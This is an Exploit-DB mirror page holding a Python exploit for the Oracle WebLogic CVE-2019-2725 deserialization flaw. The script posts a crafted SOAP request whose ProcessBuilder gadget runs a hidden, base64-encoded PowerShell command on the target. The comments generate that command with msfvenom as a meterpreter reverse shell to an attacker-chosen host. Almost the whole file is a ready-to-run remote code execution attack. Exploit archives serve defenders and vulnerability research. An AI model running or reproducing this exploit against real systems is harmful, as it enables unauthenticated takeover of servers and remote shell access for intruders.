bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/webapps/46780.py
Offensive Security f3c28b3d62 DB: 2019-05-01 
23 changes to exploits/shellcodes

SpotAuditor 3.6.7 - Denial of Service (PoC)
SpotAuditor 3.6.7 - 'Base64 Encrypted Password' Denial of Service (PoC)
SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)
Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification

IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)
IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)

DeviceViewer 3.12.0.1 - 'user' SEH Overflow
Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow
Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)
AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)
Pimcore < 5.71 - Unserialize RCE (Metasploit)
Netgear DGN2200 / DGND3700 - Admin Password Disclosure
Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)
Intelbras IWR 3000N - Denial of Service (Remote Reboot)
Joomla! Component ARI Quiz 3.7.4 - SQL Injection
Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery
HumHub 1.3.12 - Cross-Site Scripting
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
Domoticz 4.10577 - Unauthenticated Remote Command Execution
Joomla! Component JiFile 2.3.1 - Arbitrary File Download
Hyvikk Fleet Manager - Shell Upload
Agent Tesla Botnet - Information Disclosure
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
2019-05-01 05:02:01 +00:00

55 lines
No EOL
9.4 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725
# Date: 30/04/2019
# Exploit Author: Avinash Kumar Thapa
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0
# Tested on:
#OS: Windows 2012 R2 (Build 9600).
#Architecture : x64
#System Language : en_US
# CVE : CVE-2019-2725
# Script Usage:
# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1
# Add the powershell command in the variable
__author__ = "Avinash Kumar Thapa"
__description__ = """
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server
CREDIT STATEMENT:
The following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:
Badcode of Knownsec 404 Team: CVE-2019-2725
Hongwei Pan of Minsheng Banking Corp.: CVE-2019-2725
Liao Xinxi of NSFOCUS Security Team: CVE-2019-2725
Lin Zheng of Minsheng Banking Corp.: CVE-2019-2725
Song Keya of Minsheng Banking Corp.: CVE-2019-2725
Tianlei Li of Minsheng Banking Corp.: CVE-2019-2725
ZengShuai Hao: CVE-2019-2725
Zhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725
"""
import requests
import sys
print "Exploit Written by Avinash Kumar Thapa"
exploit = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABQAFcAeAAxAHcAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAagA5AEQAMQBhAEYAWgBGAHMAaABHAEIATABhAE4ASgBFAHEAMwBaAHAAWABVADUAeQBZAE8AQgBBAEkAaAAwADQAYgBlADIAMgBXAHIATAAzAEUAWABoAE8AZwAxAC8AOQArAHMAMgBDAG4ANgBUAFcAdAAyAHAAUABPADQAbQBWAGYAWgBtAFoAbgBuAG4AbABtADEAawBFAFcAZQA0AEwAeQBXAEYAawBzAHUAZgBMADUAegBlAEcAQgBnAHgATQBjAEsAVgBvAHAAYQBrADMASwBTAG0AbgBWAGEANQArAG0AKwBzAEUAQgBiAEoAUgBXAFYAawBmADUAcQBHAGgAVAB0AEYAdwAyAGUAWQBSAHAAUABMAHUANABhAEcAUgBKAFEAbQBLAHgAbgAxAGMANgBSAEsAQQAwAEoAZABFADkAbwB5AFQAVgBkAE8AVgB2ADUAWABaAE8ARQBuAEoAOABkAGIAOABnAG4AbABBACsASwA2AFcALwBLAGgAMwBHADcAegBIAEwAeABUAFkATgA3AE0AMgBKAGMAbwB4AGkAWAArADcAMQB1AFkAZQBsAE0AeABWADMAeQBhAGoAUQAxAEQALwAvAFYAUABYAHAAYwBXADEAVwBhAFQAMQBtAG0ASwBXAGEANgBtADUAUwBRAGEASwBLAHoANQBpAHEASwAxADkAMABlAGUARABOAFoAawBrADAAMQBhAFoAZQB3AGwATQBlAGkATQBvAHQAagBVADkAUABLAHMATQA0AHgAUQBHADUAQgBHAHMAcgBZAGgATQB4ADUAMwA2AHEANgBoAEEARQBmAEIASQBpAHMAaQBSAFcAWgBEAGgAUwBmADcAKwByAHEAVABCADAARQB1ADQAaAAzADAAOQBJAG0AcQBwAGwAWgBTAG8AdABUADIAZQB6AFAANwBSAHAAZgB1AHgAMQBGAGcAcwBhAGsAWQBvAFYAQwA1AEwAdwBwAFUAdQBTAEYAZgBWAEkAVwB1AG4AaQAyAEcAZgBrAG0AZwBRAHoAMABIAEoARgBRAHUATgB3AHAAdQBzAGcAdAB1AEkAUABSAEMAdgBGAEcAVwBOAGwANQBYAGYATQBhAEoAZgBrAHEAUQBEAHQAVgA1AFcAMABsADAAbwBnADUAWQBoAEUATAAwAE0AZQB2AHcALwBUADUAbgA3AEcAeQBGADUAUgBmAGMAVgBQAG0AWABvAGQAbgB1AGYAMABBADMAQgBmADMAaAB5ACsATwBRAHcASwByAHAARAB6AGwAMQBTAEIAMABjAEYAMABOAHkAYgBnAG0AKwBiAHcAbABPADYAawBQAGkAcgBWAHMAbQBMAEQATQBWAGoAdwBaAEEAUABUADAAawAyAFMARQBYADMAMgBqAEsAeABTAFMAcwBmAE4AKwAvAEsAUAA5AFcAdQBGAE0ASQBnAFMAdgB3ADgAcgAwAHgARwBuAC8AZwB3ADAAOABtAFMAVwA4AEwAZwBwAGwAMwAvAE0AeQBTAFkASgBhAEUAeQBhAG0AeABoAEgAMQBDAHQAbwBwADcAMgBHAE0AQQBrAFkAMgBjAFYAWABLAGMAUQB1AHcAUwBWAE4AegBUAGUASQAzAHkAUwBNAGgARgBoAEkAMABHAFMAaQB2ADEATgByAFIAVgBRADgANgA1AG8AWgBaAFQANQBKAGsAQQBkAFoAUwBzAEUAcgBTAEsARAArAHIAVABQADcAUABHAGkAcQBGAGQAcwBrAEEAbwBUADIAYwAyAEIAZQBLAFEAQwB5AGsAMABJADYASgAvAGkAbQBPAEYAMwBPAFEAVQBoAHQATQBKAHkAbQBaAGMAWABKAG8ATgBxADgAcwB1AEkAUwB6AEkAaABmAFYAbABDAGMAMABuAHcATABaAFkATAB2AGgAdQBwAFgAZAArADIATQBDAGUAcgBoAFYAQgBUAG0AWgBuAG8ATwBZADMANQBjAGcAOABlAHAAUwBEAEkAUABjAGcAYQBoADMANwBoAEwANABsAEgATQBKAEIASgBsAHAAVQB0ADkAWQBtADUAYwBHAGgAYgBIAHEAcQAvAGkAMABNAEMATQBRAFEAMgBBAHAAUgBYAGsAQQBWAFoAawAvAEsANgBRAFQARQBqAEEAdwAxADMAVwA5AFkAcABMAGgAQgBVAHQARwBZAGwAQQBaAGwAZgAxAGIAWQBaAEQAcQBQAEcAYwA2AFQAdgBxADQASgBEADQANgByADgAYwBMAEoAaQA4AHAANgAxAEUAbwBvAEQAZwBoAFgAdQBRAFgAcABkAHgAVQBWAFoARwBOAEIASABRAE8AeQBTAHEAdwBLAEQALwBkAHYAaQBMAHAAaQBIAGQAYQBDAFEAawBUADQATgBXAFYATQBiAFUAMwBBAGoASgA2AE4ASwBXAGUAcQAyADEASgBHAFMATwB5AGcANgBEAFIARQBEADgANwBZAFIASABKAGsANwBKACsALwBxACsAUQAyAGgAdgBqAFMAdgBhAFEAUABCAE0AcgBKAGoAWgBuAHYAbABBAGEAKwBpAEoAMQBpAHcAYgB2AGsATgA2AGEAdgBIAG0AbQBmACsAcAB0ACsAZwBhAFMAWABNADkARAA1AEMAVgBXAG4AYgBYAGEAUQA2ADYAMwBmAHEAcQA1ADQANwBxAHcAbQAxAFoANABwAE4AagBDAGIAcwAxAFgAaQB4AGMAMQBMADAAZQBUAHMAUwBkAGgAYgBvADMAdABQAG8AdwBxAFcAKwBYAFAAYgBwADEAKwA4AGkAZgByAEkAMwAzAFcAMwBQADcAVgBEAFgAWAAyADAAWABvAEIANQBOAG0ARQBJAFIAbgBnAFgAdABkAGUAOQBlAG0ALwBkAHYARwB3AEsAeQBlADQASAA2AHoAbABmAFYAdgB6AFMAZQB6AFcAawA5AGIAOQBLAGsANwBvAE0AUABCAFEANgA4AHQANwBpAGMAagBoAG8AZQBCAEUAWQA1AHIANQA1AGkAdQArADgAbABpAFYATwBQADIAMQBrAEsAbwBNAHoALwAxAHQAcgAxAGcAMQBKAG4AYgAvAG0AYgBTAHAAVwBSAGgAVgBQAHQAMABnAEEAWQBJAGYAZgBLAHUAaAA4AE4ATwB1AEEAdwA3AEsAVABMAE8AUgA0ACsATgBLAEcAeQBPAEgAVwBlAEIAawBZAFYAYQBvADAAMwB2AEgAVABNAEgAdwA3AGEASgBoAGkAMQB6AGcASwArADQAYwAzAHIAVQBOAEcAcAAzAC8AbQBPAHIAZgBUAGYARwB2AFkAagA1AG4AYQA1AFIAbQA0AHkAUgBqAHgATABqAEoAcAB6AFgAegBxADcAbQBzAGMAUQBKAGgAKwBhAGoASwBXAFYAUQAvADIANwBUAE4AawBEAEcAcQBhAE4AdQAvAFkAUgB1ADcAeAA0AEgAbgBSAEMAMQBRAEcAWQBVAGMAWQBUAGIAOQBHAEYANABOAEEAYQBiAGwAegBlAGcAYwB6AHUAcwArAFIAeQBKADIAQgBvAGIAeABpAGcAMABRAGgAUwA0ADgAdwBsAEcASgBrAGkAYgBqADYAaAB0ADgAcwBiAG0AZwAyAE0ANwB4AG0AaAAwAE0AcQAvAGQAUAA5AFQAbQA0AEQATQBaAHIAegA3AFkAUABYAFQAVQA5AGgAegBEAE0ASQA2AGkAZQAvAGcAMQBrAEcAYwB2ADEALwBIAFkAZgBEAHAAYgBQAFEAbgBjAHUAdwBYAGIATgA4AGIANQA4AE8ATgBiAHkAUgBFAGcAUwBTAGsAeQBhADgAMABYAHUAZgA5AFIAeQA3AFoAeABrAHMANAB4AEEAMAA1AEEATQB5ADcASwBzAE0AMgBUAGQAdAA1AGUASABVADYAbABoAHEAYgBKAEsALwBtAEIASgBEAEYAaABjAEsAUABCAG4AVgBlAFEARwBUAEgARwBQAGQAbgBjAG8AUQAvAEQAdABiAEoAdgA5AHYATAB1AEcAYwBMAHcAOQBPAFQAVgBrAGEANAA4AEMAKwBwAGYAZQAzADYAeABkAEgARgB4AEIAeQA1AEMAZABlAHoANABXACsAbQBUAE8AQgBUAHoAYwBuAFYAOQBXAHEAMQBDAEQANgArAHUANgAxAFcASQA4AGQAZgBqAGEAdgBEAGwAUgB0AHYAYgBLAHMAdABMAFkASQBmAE0AcwAzAFcAMgBzADYANwBMAHUAaQBrAHQAKwA2AFAALwBGAGIARwA4AFYAdQBmAHcANQAvADgAYwBzAGEAOQByAFAAOQBuADkASgBSAFMAcgA1AFgAMgA4ADMAeQAxAC8AdQAvAEIAYgBpAFAANQB1ADMATABlAFkAQwBoAEIAMABvAGQARQB3AHMAcgAvAG4AWABnAHMALwA1ADgAYQBMAGwAdwBCAEkAQwBPAFEAOQB5AEIALwA1AEMAbgBlAFYAaQBlAE4ATABlAEQAVgA0AGMALwBnAFAAeQBrAHYAWgBDAGkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA=="
url = sys.argv[1]
request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Content-Type": "text/xml"}
data="<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\r\n <soapenv:Header>\r\n <wsa:Action>xx</wsa:Action>\r\n <wsa:RelatesTo>xx</wsa:RelatesTo>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <void class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\">\r\n <void index=\"0\">\r\n <string>cmd</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>/c</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>%s</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/></void>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body>\r\n <asy:onAsyncDelivery/>\r\n </soapenv:Body>\r\n</soapenv:Envelope>" % (exploit)
response = requests.post(url, headers=request_headers, data=data)
print "status_code:%s" % str(response.status_code)
print(response)
Reference in a new issue View git blame Copy permalink